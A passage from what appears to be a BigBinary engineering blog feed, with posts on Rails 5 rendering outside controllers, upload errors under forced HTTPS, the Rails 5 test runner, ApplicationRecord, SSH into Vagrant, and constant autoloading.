the same way weuse them in controller actions. Those instance variables will be passed to theview that is going to be rendered.</p><p>Rendering partials is also possible.</p><pre><code class="language-ruby">OrdersController.render :_form, locals: { order: Order.last }</code></pre><p>This will render <code>app/views/orders/_form.html.erb</code> and will pass <code>order</code> aslocal variable.</p><p>Say I want to render all orders, but in JSON format.</p><pre><code class="language-plaintext">OrdersController.render json: Order.all# =&gt; &quot;[{&quot;id&quot;:1, &quot;name&quot;:&quot;The Well-Grounded Rubyist&quot;, &quot;author&quot;:&quot;David A. Black&quot;},       {&quot;id&quot;:2, &quot;name&quot;:&quot;Remote: Office not required&quot;, &quot;author&quot;:&quot;David &amp; Jason&quot;}]</code></pre><p>Even rendering simple text is possible.</p><pre><code class="language-ruby">&gt;&gt; BooksController.render plain: 'this is awesome!'  Rendered text template (0.0ms)# =&gt; &quot;this is awesome!&quot;</code></pre><p>Similar to <code>text</code>, we can also use <code>render file</code> and <code>render template</code>.</p><h3>Request environment</h3><p>A typical web request carries its own environment with it. We usually handlethis environment using <code>request.env</code> in controllers. Certain gems like <code>devise</code>depends on <code>env</code> hash for information such as warden token.</p><p>So when we are rendering outside of controller, we need to make sure that therendering happens with correct environment.</p><p>Rails provides a default rack environment for this purpose. The default optionsused can be accessed through <code>renderer.defaults</code>.</p><pre><code class="language-ruby">&gt;&gt; OrdersController.renderer.defaults=&gt; {:http_host=&gt;&quot;example.org&quot;, :https=&gt;false, :method=&gt;&quot;get&quot;, :script_name=&gt;&quot;&quot;, :input=&gt;&quot;&quot;}</code></pre><p>Internally, Rails will build a new Rack environment based on these options.</p><h2>Customizing the environment</h2><p>We can customize environment using method <code>renderer</code>. Let's say that we need&quot;method as post&quot; and we want &quot;https to be true&quot; for our background jobprocessing.</p><pre><code class="language-ruby">renderer = ApplicationController.renderer.new(method: 'post', https: true)# =&gt; #&lt;ActionController::Renderer:0x007fdf34453f10 @controller=ApplicationController, @defaults={:http_host=&gt;&quot;example.org&quot;, :https=&gt;false, :method=&gt;&quot;get&quot;, :script_name=&gt;&quot;&quot;, :input=&gt;&quot;&quot;}, @env={&quot;HTTP_HOST&quot;=&gt;&quot;example.org&quot;, &quot;HTTPS&quot;=&gt;&quot;on&quot;, &quot;REQUEST_METHOD&quot;=&gt;&quot;POST&quot;, &quot;SCRIPT_NAME&quot;=&gt;&quot;&quot;, &quot;rack.input&quot;=&gt;&quot;&quot;}&gt;</code></pre><p>Now that we have our custom <code>renderer</code> we can use it to generate view.</p><pre><code class="language-ruby">renderer.render template: 'show', locals: { order: Order.last }</code></pre><p>Overall this is a nice feature which enables reuse of existing code.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Not using https might be breaking file uploads]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/not-using-https-might-be-breaking-file-uploads"/>
      <updated>2016-01-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/not-using-https-might-be-breaking-file-uploads</id>
      <content type="html"><![CDATA[<p>Recently we came across following errorwhen mobile app was trying to upload images using backend API.</p><pre><code class="language-bash">==&gt; nginx-error.log &lt;==2015/12/16 07:34:13 [error] 1440#0: *1021901sendfile() failed (32: Broken pipe) while sending request to upstream,client: xxx.xx.xxx.xx, server: app-name.local,request: &quot;POST /api_endpoint HTTP/1.1&quot;,upstream: &quot;http://unix:/data/apps/app-name/shared/tmp/sockets/unicorn.sock:/api_endpoint&quot;,host: &quot;appname.com&quot;==&gt; nginx-error.log &lt;==xxx.xx.xxx.xx - - [16/Dec/2015:07:34:13 - 0500]&quot;POST /api_endpoint HTTP/1.1&quot; 502 1051 &quot;-&quot;&quot;Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 (366691552)&quot;</code></pre><p>The backend API was developed using Ruby on Rails and was powered using NGINX HTTP server along with unicorn application server.</p><p>Notice the http response received was <code>502</code> which is documented inRFC as shown below.</p><blockquote><p>10.5.3 502 Bad GatewayThe server, while acting as a gateway or proxy, received an invalid response from the upstream server it accessed in attempting to fulfill the request.</p></blockquote><h2>Debugging the problem</h2><p>From the first look it seemed that the <code>client_max_body_size</code> parameter for nginx was too less,which might cause the request to fail if the uploaded filesize is greater than the allowed limit.</p><pre><code class="language-bash">nginx.confhttp {  ...  client_max_body_size 250M;  ...}</code></pre><p>But that was not the case with our NGINX configuration.The NGINX was configured to accept file size up to 250 megabytes, while the file being uploaded was around 6 megabytes.</p><p>In our Rails code we are forcing all traffic to use HTTPS by having <code>production.rb</code> to have following setting.</p><pre><code class="language-ruby">config.force_ssl = true</code></pre><p>What this setting does is, it forces HTTPS by redirecting HTTP requests to their HTTPS counterparts.So any request accessing <code>http://domain.com/path</code> will be redirected to <code>https://domain.com/path</code></p><p>Forcing all traffic to HTTPS still does not explain the vague error <code>sendfile() failed (32: Broken pipe) while sending request to upstream</code> and why the <code>HTTP 502</code> error which means <code>Bad Gateway</code></p><p>Here is how our <code>nginx.conf</code> is configured.</p><pre><code class="language-bash">server {  ...  listen 80;  listen 443 ssl;  ...}</code></pre><p>NGINX is configured to accept both HTTP and HTTPS requests. This is apretty standard setting so that application can support bothHTTP and HTTPS.What it means is that nginx will accept both HTTP and HTTPS request.It would not force HTTP request to be HTTPS.It would forward HTTP request to rails backend api.</p><h2>Here is what happens when you upload a file</h2><p>When we upload a file then NGINX takes that request and passes thatrequest to Rails. NGINX expects a response from Rails only whenNGINX is done sending the whole request.</p><p>Let's see what happens when a user visits login page using HTTP. NGINXtakes the request and passes the request to Rails. When NGINX is donehanding over the request to Rails then NGINX expects a response fromRails. However in this case rather than sending 200 Rails sends aredirect over HTTPS. So now NGINX takes up the request again over HTTPSand then hands over request to Rails. Rails processes the request andreturns 200. Everything works out.</p><p>Now let's see what happens when a file is uploaded over HTTP.</p><p>User uploads a file over HTTP. NGINX takes up the request and startssending the file to Rails. More details about the file upload processcan be see at RFC (Link is not available). The data issent to server in chunks. When first chunk is sent to server then servernotices that data is being sent over HTTP and it immediately sends aresponse that data should be sent over HTTPS.</p><p>In the meantime on the client side , client is still pushing rest of thedata to the server. Client expects a response from the server only whenit is done pushing all the data. However in this case server sends aresponse when client is not expecting it.</p><p>NGINX at this time is all confused and thinks something has gone wrongwith the gateway and returns <code>HTTP/1.1 502 Bad Gateway</code> and aborts theupload operation. And that how we get the <code>502</code> error.</p><p>So next time you see an error like this make sure that you are using<code>https</code> to upload the file if server is enforcing <code>https</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Year in review 2015]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/year-in-review-2015"/>
      <updated>2016-01-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/year-in-review-2015</id>
      <content type="html"><![CDATA[<p>Year 2015 was an exciting year for BigBinary !</p><p>We added more <a href="https://bigbinary.com/clients">clients</a>. We increased<a href="https://bigbinary.com/team">our team</a> size. We wrote more <a href="/blog">blogs</a>, spokeat more <a href="https://bigbinary.com/presentations">conferences</a>, and made even<a href="https://bigbinary.com/videos">more videos</a> !</p><p>Here is the breakdown.</p><h2>We love conferences</h2><p>We presented at 10 conferences across 7 countries, on topics from<a href="http://rubyonrails.org/">Rails</a> to<a href="https://facebook.github.io/react/">ReactJS</a>.</p><ul><li><a href="http://www.gardencityruby.org/">Garden City RubyConf, India</a></li><li><a href="http://rubyconf.ph/">RubyConf, Philippines</a></li><li><a href="http://rubyconfindia.org/">RubyConf, India</a></li><li><a href="http://www.reddotrubyconf.com/">Reddot RubyConf, Singapore</a></li><li><a href="http://www.deccanrubyconf.org/">Deccan RubyConf, India</a></li><li><a href="http://2015.fullstackfest.com/">Full Stack Fest, Spain</a></li><li><a href="http://2015.rubyconf.tw/">RubyConf, Taiwan</a></li><li><a href="http://rockymtnruby.com/">Rocky Mountain Ruby, Colorado</a></li><li><a href="http://www.rubyconf.co/">RubyConf, Colombia</a></li></ul><h2>We are all in ReactJS</h2><p>We at BigBinary adopted ReactJS pretty early. Early in the year we publishedseries of videos titled<a href="https://bigbinary.com/videos/learn-reactjs-in-steps">Learn ReactJS in steps</a>which takes a &quot;Hello World&quot; app into a full TODO application using ReactJS inincremental steps.</p><p>Vipul and Prathamesh are currently authoring a book on ReactJS. Check it out at<a href="https://www.packtpub.com/web-development/reactjs-example-building-modern-web-applications-react">ReactJS by Example- Building Modern Web Applications with React Book</a></p><p>We also started an ios app using React Native. It's coming along pretty good andsoon we should see it in app store.</p><h2>We authored many blogs</h2><p>We love sharing our experiences via blogs on various topics like ReactJS, Rails,React Native and Robot framework etc. Here are some of our blogs from 2015.</p><ul><li><a href="how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript">How to obtain current time from a different timezone in Selenium IDE using javascript</a>,Prabhakar, Jan 2015</li><li><a href="author-information-in-jekyll-blog">Author information in jekyll blog</a>,Neeraj, Jan 2015</li><li><a href="phone-verification-using-twilio">Phone verification using SMS via Twilio</a>,Santosh, Jan 2015</li><li><a href="blue-border-around-jwplayer-video">Blue border around JWPLAYER video</a>,Prathamesh, Feb 2015</li><li><a href="gotcha-with-after_commit-callback-in-rails">Gotcha with after_commit callback in Rails</a>,Prathamesh, March 2015</li><li><a href="voice-based-phone-verification-using-twilio">Voice based phone verification using twilio</a>,Santosh, March 2015</li><li><a href="verifying-pubsub-services-from-rails-redis">Verifying PubSub Services from Rails using Redis</a>,Vipul, May 2015</li><li><a href="using-reactjs-with-rails-actioncable">Using ReactJS with Rails Action Cable</a>,Vipul, July 2015</li><li><a href="how-to-test-react-native-app-on-real-iphone">How to test React Native App on a real iPhone</a>,Chirag, Aug 2015</li><li><a href="code-optimize-javascript-code-using-babeljs">Optimize JavaScript code using BabelJS</a>,Prathamesh, Aug 2015</li><li><a href="configuring-pycharm-to-run-tests">Configuring Pycharm IDE to run a Robot Framework test suite or a single test script</a>,Prabhakar, Oct 2015</li><li><a href="migrating-from-postgresql-to-sqlserver">Migrating rails app from postgresql to sql server</a>,Rohit, Oct 2015</li><li><a href="getting-around-apple-ituneconnect-activation-issue">Getting around Apple iTunesConnect account activation issue</a>,Prathamesh, Oct 2015</li><li><a href="rails-5-allows-setting-custom-http-headers-for-assets">Rails 5 allows setting custom HTTP Headers for assets</a>,Vipul, Oct 2015</li><li><a href="using-stripe-api-in-react-native-with-fetch">Using Stripe API in React Native with fetch</a>,Chirag, Nov 2015</li><li><a href="how-constant-lookup-happens-in-rails">How constant lookup and resolution works in Ruby on Rails</a>,Mohit, Nov 2015</li><li><a href="explicitly-ssh-into-vagrant-machine">Explicitly ssh into vagrant machine</a>,Neeraj, Dec 2015</li><li><a href="application-record-in-rails-5">ApplicationRecord in Rails 5</a>, Prathamesh, Dec2015</li></ul><h2>Video Summary</h2><ul><li><a href="https://bigbinary.com/videos/learn-ruby-on-rails">Learn Ruby on Rails</a><ul><li><a href="https://bigbinary.com/videos/learn-ruby-on-rails/use-uuid-x-request-id-and-tagged-logging-to-debug-rails-application">Use uuid, X-Request-Id and tagged logging to debug rails application</a>.</li><li><a href="https://bigbinary.com/videos/learn-ruby-on-rails/rails-development-using-vagrant">Rails development using vagrant</a>.</li><li><a href="https://bigbinary.com/videos/learn-ruby-on-rails/using-es6-in-rails-application">Using ES6 in Rails application</a>.</li></ul></li><li><a href="https://bigbinary.com/videos/learn-reactjs-in-steps">Learn ReactJS in step</a></li><li><a href="https://bigbinary.com/videos/keep-up-with-reactjs">Keep up with ReactJS</a></li><li><a href="https://bigbinary.com/videos/learn-javascript">Learn JavaScript</a><ul><li><a href="https://bigbinary.com/videos/learn-javascript/refactor-javascript-code-using-module-pattern">Refactor JavaScript code using module pattern</a></li><li><a href="https://bigbinary.com/videos/learn-javascript/a-review-of-tools-to-test-es6">A review of tools to test ES6</a></li></ul></li><li><a href="https://bigbinary.com/videos/learn-selenium">Learn Selenium</a></li></ul><h2>Open Source</h2><p>Apart from our team members contributing to various OpenSource projects, we alsosupport some projects from our team. This year, we added and helped buildfollowing projects-</p><ul><li><a href="https://github.com/bigbinary/wheel">Wheel</a> : Wheel is our Rails template fornew Ruby on Rails projects, with sane defaults and setups for differentenvironments, and common functionalities like image uploaders, debugging, etc.</li><li><a href="https://github.com/bigbinary/mail_interceptor">Mail Interceptor</a> :Interception, Forwarding emails in Ruby on Rails application</li><li><a href="https://github.com/bigbinary/handy">Handy</a> : A collection handy tools andRails tasks for your Project.</li><li><a href="https://github.com/bigbinary/learn-reactjs-in-steps">Learn ReactJS in Steps</a>: Collection of examples from<a href="https://bigbinary.com/videos/learn-reactjs-in-steps">Learn ReactJS in step</a>video series.</li><li>Doctsplit Chef(Link is not available) : Check cookboxfor <a href="https://documentcloud.github.io/docsplit/">docsplit</a> ruby gem</li><li>Fixtures Dumper(Link is not available) : Dump yourRails data to fixtures easily to a database to populate data.</li></ul><h2>Community Engagement</h2><p>Along with speaking at various conferences, we also helped organize, our Funedition of Pune's regional RubyConf,<a href="http://www.deccanrubyconf.org/">DeccanRubyConf</a>, and supported other IndianConferences, including <a href="http://rubyconfindia.org/">RubyConfIndia</a>,<a href="http://www.gardencityruby.org/">GardenCity RubyConf</a>.</p><p>We also help Pune's local <a href="http://www.meetup.com/punerailsmeetup/">ruby meetup</a>,which had a splendid engagement this year.</p><p>Overall we are super excited about what we accomplished in year 2015. We arelooking forward to an exciting year of 2016!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Test runner in Rails 5]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/test-runner-in-rails-5"/>
      <updated>2016-01-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/test-runner-in-rails-5</id>
      <content type="html"><![CDATA[<p>If you run <code>bin/rails -h</code> in a Rails 5 app, you will see a new command forrunning tests.</p><pre><code class="language-bash">$ bin/rails -hUsage: rails COMMAND [ARGS]The most common rails commands are: generate    Generate new code (short-cut alias: &quot;g&quot;) console     Start the Rails console (short-cut alias: &quot;c&quot;) server      Start the Rails server (short-cut alias: &quot;s&quot;) test        Run tests (short-cut alias: &quot;t&quot;)</code></pre><p>Before Rails 5, we had to use <code>bin/rake test</code> to run tests. But in Rails 5, wecan use <code>bin/rails test</code>. It is not just replacement of old rake task but it isbacked by a <code>test runner</code> inspired from RSpec, minitest-reporters, maxitest andothers.</p><p>Let's see what <code>bin/rails test</code> can do.</p><h2>Running a single test</h2><p>Now it is possible to run a single test out of the box using the line number ofthe test.</p><pre><code class="language-bash">$ bin/rails test test/models/user_test.rb:27</code></pre><p>Rails will intelligently run the test from user_test.rb having line number 27.Note that the line number 27 does not need to be first line of the test. Belowis an example.</p><pre><code class="language-ruby">22: def test_valid_user23:   hash = { email: 'bob@exmaple.com',24:            first_name: 'John',25:            last_name: 'Smith' }26:27:   user = User.new hash28:29:   assert user.valid?30: end</code></pre><p>In the above case, <code>test_valid_user</code> can be run as long as the line numberprovided is between 22 and 30.</p><h2>Running multiple tests</h2><p>You can also pass multiple test paths and Rails will run all of those tests.</p><pre><code class="language-bash">$ bin/rails test test/models/user_test.rb:27 test/models/post_test.rb:42</code></pre><p>It is also possible to run all tests from a directory.</p><pre><code class="language-bash">$ bin/rails test test/controllers test/integration</code></pre><h2>Improved failure messages</h2><p>When a test fails, Rails displays a command which can be used to just run thefailed test.</p><pre><code class="language-bash">$ bin/rails tRun options: --seed 51858# Running:.FFailure:PostsControllerTest#test_should_get_new:Expected response to be a &lt;success&gt;, but was a &lt;302&gt; redirect to &lt;http://test.host/posts&gt;bin/rails test test/controllers/posts_controller_test.rb:15</code></pre><p>I can simply copy <code>bin/rails test test/controllers/posts_controller_test.rb:15</code>and rerun the failing test.</p><h2>Failing fast</h2><p>By default when a test fails then rails reports about the test failures and thenmoves on to the next test. If you want to stop running the test when a testfails then use option <code>-f</code>.</p><pre><code class="language-bash">$ bin/rails t -fRun options: -f --seed 59599# Running:..FFailure:PostsControllerTest#test_should_get_new:Expected response to be a &lt;success&gt;, but was a &lt;302&gt; redirect to &lt;http://test.host/posts&gt;bin/rails test test/controllers/posts_controller_test.rb:15Interrupted. Exiting...Finished in 0.179125s, 16.7481 runs/s, 22.3308 assertions/s.3 runs, 4 assertions, 1 failures, 0 errors, 0 skips</code></pre><h2>Defer test output until the end of the full test run</h2><p>By default when a test fails then rails prints <code>F</code> and then details about thefailure like what assertion failed and how to re run the test etc.</p><p>If you want to have a clean output of <code>.</code> and <code>F</code> and would like all the testfailures report to come at the every end then use option <code>-d</code>.</p><pre><code class="language-plaintext">$ bin/rails t -dRun options: -d --seed 29906# Running:..F...FFinished in 0.201320s, 34.7704 runs/s, 49.6721 assertions/s.  1) Failure:PostsControllerTest#test_should_create_post [/Users/prathamesh/Projects/fun/rails-5-test-runner-app/test/controllers/posts_controller_test.rb:19]:&quot;Post.count&quot; didn't change by 1.Expected: 3  Actual: 2  2) Failure:PostsControllerTest#test_should_get_new [/Users/prathamesh/Projects/fun/rails-5-test-runner-app/test/controllers/posts_controller_test.rb:15]:Expected response to be a &lt;success&gt;, but was a &lt;302&gt; redirect to &lt;http://test.host/posts&gt;7 runs, 10 assertions, 2 failures, 0 errors, 0 skipsFailed tests:bin/rails test test/controllers/posts_controller_test.rb:19bin/rails test test/controllers/posts_controller_test.rb:15</code></pre><h2>Better backtrace output</h2><p>By default when an error is encountered while running the test then the outputdoes not contain full stacktrace. This makes debugging little bit difficult.</p><pre><code class="language-plaintext">Error:PostsControllerTest#test_should_create_post:NameError: undefined local variable or method `boom' for #&lt;PostsController:0x007f86bc62b728&gt;    app/controllers/posts_controller.rb:29:in `create'    test/controllers/posts_controller_test.rb:20:in `block (2 levels) in &lt;class:PostsControllerTest&gt;'    test/controllers/posts_controller_test.rb:19:in `block in &lt;class:PostsControllerTest</code></pre><p>Now we can use <code>-b</code> switch, which will display complete backtrace of errormessage.</p><pre><code class="language-plaintext">$ bin/rails t -bError:PostsControllerTest#test_should_create_post:NameError: undefined local variable or method `boom' for #&lt;PostsController:0x007fc53c4eb868&gt;    /rails-5-test-runner-app/app/controllers/posts_controller.rb:29:in `create'    /sources/rails/actionpack/lib/action_controller/metal/basic_implicit_render.rb:4:in `send_action'    /sources/rails/actionpack/lib/abstract_controller/base.rb:183:in `process_action'    /sources/rails/actionpack/lib/action_controller/metal/rendering.rb:30:in `process_action'    /sources/rails/actionpack/lib/abstract_controller/callbacks.rb:20:in `block in process_action'    /sources/rails/activesupport/lib/active_support/callbacks.rb:126:in `call'.....    /sources/rails/activesupport/lib/active_support/testing/assertions.rb:71:in `assert_difference'    /rails-5-test-runner-app/test/controllers/posts_controller_test.rb:19:in `block in &lt;class:PostsControllerTest&gt;'</code></pre><h2>Leveraging power of Minitest</h2><p>The test runner also leverages power of minitest by providing some handyoptions.</p><h5>Switch -s to provide your own seed</h5><p>Now we can also provide our own seed using <code>-s</code> switch.</p><pre><code class="language-bash">$ bin/rails t --s 42000</code></pre><h4>Switch -n to run matching tests</h4><p>Switch <code>-n</code> will run tests matching the given string or regular expressionpattern.</p><pre><code class="language-plaintext">$ bin/rails t -n &quot;/create/&quot;Run options: -n /create/ --seed 24558# Running:EError:PostsControllerTest#test_should_create_post:NameError: undefined local variable or method `boom' for #&lt;PostsController:0x007faa39c2df90&gt;    app/controllers/posts_controller.rb:29:in `create'    test/controllers/posts_controller_test.rb:20:in `block (2 levels) in &lt;class:PostsControllerTest&gt;'    test/controllers/posts_controller_test.rb:19:in `block in &lt;class:PostsControllerTest&gt;'bin/rails test test/controllers/posts_controller_test.rb:18Finished in 0.073857s, 13.5396 runs/s, 0.0000 assertions/s.1 runs, 0 assertions, 0 failures, 1 errors, 0 skips</code></pre><h4>Verbose output</h4><p>It is also possible to see the verbose output using <code>-v</code> switch. It shows timerequired to run each test. This would help in detecting slow running tests.</p><pre><code class="language-plaintext">$ bin/rails t -vRun options: -v --seed 30118# Running:PostsControllerTest#test_should_destroy_post = 0.07 s = .PostsControllerTest#test_should_update_post = 0.01 s = .PostsControllerTest#test_should_show_post = 0.10 s = .PostsControllerTest#test_should_create_post = 0.00 s = FFailure:PostsControllerTest#test_should_create_post:&quot;Post.count&quot; didn't change by 1.Expected: 3  Actual: 2bin/rails test test/controllers/posts_controller_test.rb:19PostsControllerTest#test_should_get_new = 0.02 s = .PostsControllerTest#test_should_get_index = 0.01 s = .PostsControllerTest#test_should_get_edit = 0.00 s = .Finished in 0.210071s, 33.3220 runs/s, 47.6028 assertions/s.7 runs, 10 assertions, 1 failures, 0 errors, 0 skips</code></pre><h3>Colored output</h3><p>Now by default we will get colored output. No need to add additional gem tocolored output.</p><p><img src="/blog_images/2016/test-runner-in-rails-5/rails_5_test_runner.png" alt="colored test output"></p><p>With all these awesome features, testing Rails 5 apps has definitely become abetter experience. Rails has shipped all these features within the frameworkitself so you don't have to use multiple gems and libraries to achieve all ofthese things.</p>]]></content>
    </entry><entry>
       <title><![CDATA[ApplicationRecord in Rails 5]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/application-record-in-rails-5"/>
      <updated>2015-12-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/application-record-in-rails-5</id>
      <content type="html"><![CDATA[<p><a href="http://weblog.rubyonrails.org/2015/12/18/Rails-5-0-beta1/">Rails 5 beta-1</a> wasrecently released and one of the notable change was introduction of<a href="https://github.com/rails/rails/pull/22567">ApplicationRecord</a>.</p><p>Up to Rails 4.2, all models inherited from <code>ActiveRecord::Base</code>. But startingfrom Rails 5, all models will inherit from <code>ApplicationRecord</code>.</p><pre><code class="language-ruby">class Post &lt; ApplicationRecordend</code></pre><p>What happened to <code>ActiveRecord::Base</code> ?</p><p>Well not much changed in reality. Following file will be automatically added tomodels in Rails 5 applications.</p><pre><code class="language-ruby"># app/models/application_record.rbclass ApplicationRecord &lt; ActiveRecord::Base  self.abstract_class = trueend</code></pre><p>This behavior is similar to how controllers inherit from <code>ApplicationController</code>instead of inheriting from <code>ActionController::Base</code>.</p><p>Now <code>ApplicationRecord</code> will be a single point of entry for all thecustomizations and extensions needed for an application, instead of monkeypatching <code>ActiveRecord::Base</code>.</p><p>Say I want to add some extra functionality to Active Record. This is what Iwould do in Rails 4.2.</p><pre><code class="language-ruby">module MyAwesomeFeature  def do_something_great    puts &quot;Doing something complex stuff!!&quot;  endendActiveRecord::Base.include(MyAwesomeFeature)</code></pre><p>But now, <code>ActiveRecord::Base</code> forever includes <code>MyAwesomeFeature</code> and any classinheriting from it also includes <code>MyAwesomeFeature</code> even if they don't want it.</p><p>This is especially true if you are using plugins and engines where monkeypatching to <code>ActiveRecord::Base</code> can leak into engine or plugin code.</p><p>But with <code>ApplicationRecord</code>, they will be localized to only those models whichare inheriting from <code>ApplicationRecord</code>, effectively only to your application.</p><pre><code class="language-ruby">class ApplicationRecord &lt; ActiveRecord::Base  include MyAwesomeFeature  self.abstract_class = trueend</code></pre><h2>Migrating from Rails 4</h2><p>By default all new Rails 5 applications will have <code>application_record.rb</code>. Ifyou are migrating from Rails 4, then simply create<code>app/models/application_record.rb</code> as shown below and change all models toinherit from <code>ApplicationRecord</code> instead of <code>ActiveRecord::Base</code>.</p><pre><code class="language-ruby"># app/models/application_record.rbclass ApplicationRecord &lt; ActiveRecord::Base  self.abstract_class = trueend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Explicitly ssh into vagrant machine]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/explicitly-ssh-into-vagrant-machine"/>
      <updated>2015-12-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/explicitly-ssh-into-vagrant-machine</id>
      <content type="html"><![CDATA[<p>After building vagrant machine the command to ssh into the guest machine ispretty simple.</p><pre><code class="language-plaintext">vagarnt ssh</code></pre><p>While working with chef I needed to explicitly ssh into the vagrant machine. Ittook me sometime to figure it out.</p><p>The key is command <code>vagrant ssh-config</code>. The output might look like this.</p><pre><code class="language-plaintext">$ vagrant ssh-configHost vmachine  HostName 127.0.0.1  User vagrant  Port 2222  UserKnownHostsFile /dev/null  StrictHostKeyChecking no  PasswordAuthentication no  IdentityFile /Users/nsingh/code/vagrant-machine/.vagrant/machines/vmachine/virtualbox/private_key  IdentitiesOnly yes  LogLevel FATAL  ForwardAgent yes</code></pre><p>Open <code>~/.ssh/config</code> and paste the output at the end of the file and save thefile.</p><p>Now I can ssh into vagrant machine using ssh command as shown below.</p><pre><code class="language-plaintext">ssh vmachine</code></pre><p>If you are wondering from where the name <code>vmachine</code> came then this is the name Ihad given to<a href="https://github.com/bigbinary/vagrant-machine/blob/f5257dc088dfdf07c73e57130425c28a363dc399/Vagrantfile#L17">my vagrant machine</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How constant lookup and resolution works in Ruby on Rails]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/how-constant-lookup-happens-in-rails"/>
      <updated>2015-11-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-constant-lookup-happens-in-rails</id>
      <content type="html"><![CDATA[<p>When a Rails application involving multiple gems, engines etc. are built then it's importantto know how constants are looked up and resolved.</p><p>Consider a brand new Rails app with model <code>User</code>.</p><pre><code class="language-ruby">class User  def self.model_method    'I am in models directory'  endend</code></pre><p>Run <code>User.model_method</code> in rails console. It runs as expected.</p><p>Now add file <code>user.rb</code> in <code>lib</code> directory.</p><pre><code class="language-ruby">class User  def self.lib_method    'I am in lib directory'  endend</code></pre><p>Reload rails console and try executing <code>User.model_method</code> and <code>User.lib_method</code>.You will notice that <code>User.model_method</code> gets executed and <code>User.lib_method</code> doesn't. Why is that?</p><h2>In Rails we do not import files</h2><p>If you have worked in other programming languages like Python or Javathen in your file you must have statements to import other files. Thecode might look like this.</p><pre><code class="language-plaintext">import static com.googlecode.javacv.jna.highgui.cvCreateCameraCapture;import static com.googlecode.javacv.jna.highgui.cvGrabFrame;import static com.googlecode.javacv.jna.highgui.cvReleaseCapture;</code></pre><p>In Rails we do not do that. That's because<a href="https://twitter.com/dhh">DHH</a>does not like the idea of opening a file and seeing the top of the filelittered with import statements.He likes to see his files beautiful.</p><p>Since we do not import file then how does it work?</p><p>In Rails console when user types <code>User</code> then rails detects that <code>User</code>constant is not loaded yet.So it needs to load <code>User</code> constant.However in order to do that it has to load a file.What should be thename of the file. Here is what Rails does.Since the constant name is <code>User</code> Rails says that I'm going to look for file <code>user.rb</code>.</p><p>So now we know that we are looking for <code>user.rb</code> file. But thequestion is where to look for that file. Rails has <code>autoload_path</code>. Asthe name suggests this is a list of paths from where files areautomatically loaded. Rails will search for <code>user.rb</code> in this list ofdirectories.</p><p>Open Rails console and give it a try.</p><pre><code class="language-plaintext">$ rails consoleLoading development environment (Rails 4.2.1)irb(main):001:0&gt; ActiveSupport::Dependencies.autoload_paths=&gt; [&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/assets&quot;,&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/controllers&quot;,&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/models&quot;,&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/helpers&quot;.............</code></pre><p>As you can see in the result one of the folders is <code>app/models</code>. WhenRails looks for file <code>user.rb</code> in <code>app/models</code> then Rails will find itand it will load that file.</p><p>That's how Rails loads <code>User</code> in Rails console.</p><h2>Adding lib to the autoload path</h2><p>Let's try to load <code>User</code> from <code>lib</code> directory.Open <code>config/application.rb</code> and add following code in theinitialization part.</p><pre><code class="language-plaintext">config.autoload_paths += [&quot;#{Rails.root}/lib&quot;]</code></pre><p>Now exit rails console and restart it.And now lets try to execute the same command.</p><pre><code class="language-plaintext">$ rails consoleLoading development environment (Rails 4.2.1)irb(main):001:0&gt; ActiveSupport::Dependencies.autoload_paths=&gt; [&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/lib&quot;,&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/assets&quot;,&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/controllers&quot;,&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/models&quot;,&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/helpers&quot;.............</code></pre><p>Here you can see that <code>lib</code> directory has been added at the very top.Rails goes from top to bottom while looking for <code>user.rb</code> file. In thiscase Rails will find <code>user.rb</code> in <code>lib</code> and Rails will stop looking for<code>user.rb</code>. So the end result is that <code>user.rb</code> in <code>app/models</code> directorywould not even get loaded as if it never existed.</p><h3>Enhancing a model</h3><p>Here we are trying to add an extra method to <code>User</code> model. If we stickour file in <code>lib</code> then our <code>user.rb</code> is never loaded because Rails willnever look for anything in <code>lib</code> by default. If we ask Rails to look in<code>lib</code> then Rails will not load file from <code>app/models</code> because the fileis already loaded. So how do we enhance a model without sticking code in<code>app/models/user.rb</code> file.</p><h2>Introducing initializer to load files from model and lib directories</h2><p>We need some way to load <code>User</code> from both models and lib directories.This can be done by adding aninitializer to <em>config/initializers</em> directory with following code snippet</p><pre><code class="language-ruby">%w(app/models lib).each do |directory|  Dir.glob(&quot;#{Rails.root}/#{directory}/user.rb&quot;).each {|file| load file}end</code></pre><p>Now both <code>User.model_method</code> and <code>User.lib_method</code> get executed as expected.</p><p>In the above case when first time <code>user.rb</code> is loaded then constant<code>User</code> gets defined. Second time ruby understands that constant isalready defined so it does not bother defining it again. However it addsadditional method <code>lib_method</code> to the constant.</p><p>In that above case if we replace <code>load file</code> with <code>require file</code> then<code>User.lib_method</code> will not work. That is because <code>require</code> will not loada file if a constant is already defined. Read<a href="http://stackoverflow.com/questions/3170638/how-does-load-differ-from-require-in-ruby">here</a>and<a href="https://practicingruby.com/articles/ways-to-load-code">here</a>to learn about how 